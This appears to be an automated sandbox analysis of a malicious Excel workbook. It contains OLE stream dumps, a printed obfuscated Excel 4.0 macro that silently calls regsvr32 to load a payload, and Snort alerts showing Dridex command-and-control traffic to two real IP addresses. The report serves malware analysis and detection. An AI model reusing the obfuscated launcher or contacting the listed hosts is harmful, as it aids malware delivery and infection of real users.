                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2042
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:2042
                Entropy:3.40353512267
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . ( l ~ j 0 . > N . . . . . . . . . . . . . . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:187
                Entropy:1.91493173134
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y e l . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o ^ . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 03 00 00 00 00 00
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 355
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:355
                Entropy:2.22761106048
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z
                Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:398
                Entropy:2.07709195049
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: VBA/dir, File Type: data, Stream Size: 819
                General
                Stream Path:VBA/dir
                File Type:data
                Stream Size:819
                Entropy:6.51488453488
                Base64 Encoded:True
                Data ASCII:. / . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                Data Raw:01 2f b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 d8 f8 ed 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                Macro 4.0 Code

                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                
                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                OLE File "/opt/package/joesandbox/database/analysis/339173/sample/sample20210113-01.xlsm"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Summary

                Author:
                Last Saved By:
                Create Time:2020-12-07T14:38:21Z
                Last Saved Time:2021-01-13T12:13:43Z
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0300

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:115
                Entropy:4.80096587863
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: f, File Type: data, Stream Size: 178
                General
                Stream Path:f
                File Type:data
                Stream Size:178
                Entropy:2.68174465556
                Base64 Encoded:False
                Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 r i . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 72 69 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                General
                Stream Path:i02/\x1CompObj
                File Type:data
                Stream Size:110
                Entropy:4.63372611993
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/f, File Type: data, Stream Size: 40
                General
                Stream Path:i02/f
                File Type:data
                Stream Size:40
                Entropy:1.54176014818
                Base64 Encoded:False
                Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/o, File Type: empty, Stream Size: 0
                General
                Stream Path:i02/o
                File Type:empty
                Stream Size:0
                Entropy:0.0
                Base64 Encoded:False
                Data ASCII:
                Data Raw:
                Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                General
                Stream Path:i03/\x1CompObj
                File Type:data
                Stream Size:110
                Entropy:4.63372611993
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i03/f, File Type: data, Stream Size: 40
                General
                Stream Path:i03/f
                File Type:data
                Stream Size:40
                Entropy:1.90677964945
                Base64 Encoded:False
                Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i03/o, File Type: empty, Stream Size: 0
                General
                Stream Path:i03/o
                File Type:empty
                Stream Size:0
                Entropy:0.0
                Base64 Encoded:False
                Data ASCII:
                Data Raw:
                Stream Path: o, File Type: data, Stream Size: 152
                General
                Stream Path:o
                File Type:data
                Stream Size:152
                Entropy:2.94405417931
                Base64 Encoded:False
                Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . ? . . . . P a g e 2 . . ? . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 f5 fa 3f 05 00 00 80 50 61 67 65 32 f5 fa 3f 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                Stream Path: x, File Type: data, Stream Size: 48
                General
                Stream Path:x
                File Type:data
                Stream Size:48
                Entropy:1.42267983198
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                Macro 4.0 Code

                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                
                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                Network Behavior

                Snort IDS Alerts

                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                01/13/21-16:39:05.193563 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49167 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:09.162191 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49170 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:09.822187 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49171 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:11.438888 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49173 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:13.268612 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49175 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:14.864235 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49177 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:14.891390 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49176 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:16.500830 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49179 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:18.261352 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49181 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:19.851961 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49183 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:19.909943 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49182 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:21.495031 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49185 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:23.452967 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49187 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:26.484676 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49188 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:26.999271 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49189 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:28.082941 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49191 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:30.368348 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49193 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:31.476021 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49194 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:31.979267 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49195 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:33.080246 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49197 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:35.353327 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49199 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:36.496929 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49200 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:36.954997 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49201 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:38.110921 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49203 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:40.366309 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49205 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:41.540806 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49206 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:42.009655 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49207 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:44.632698 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49209 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:47.274189 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49211 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:49.438105 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49213 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:49.940794 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49212 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:51.527102 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49215 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:52.826827 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49217 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:54.409200 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49219 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:54.904295 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49218 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:56.499186 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49221 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:57.763038 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49223 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:39:59.356220 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49224 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:39:59.878299 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49225 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:01.477010 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49227 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:02.732960 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49229 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:04.428544 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49231 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:05.009873 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49230 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:06.596425 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49233 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:08.074237 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49235 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:09.657018 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49237 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:09.964689 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49236 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:11.582880 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49239 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:13.046384 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49241 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:14.644800 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49243 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:14.987752 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49242 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:16.579042 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49245 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:18.032440 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49247 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:19.641858 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49249 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:19.984910 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49248 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:21.579884 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49251 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:23.045616 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49253 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:24.651791 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49255 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:24.944977 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49254 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:26.532054 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49257 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:28.012180 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49259 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:29.607398 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49261 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:29.930996 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49260 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:31.533076 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49263 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:33.000884 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49265 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:34.584873 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49267 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:34.938282 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49266 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:36.533897 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49269 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:38.001213 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49271 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:39.590940 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49273 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:39.933770 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49272 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:41.513335 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49275 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:43.006299 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49277 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:44.604045 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49279 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:44.921502 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49278 | 221.126.244.72 | 192.168.2.22
                01/13/21-16:40:46.520394 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3889 | 49281 | 195.231.69.151 | 192.168.2.22
                01/13/21-16:40:47.956826 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49283 | 221.126.244.72 | 192.168.2.22
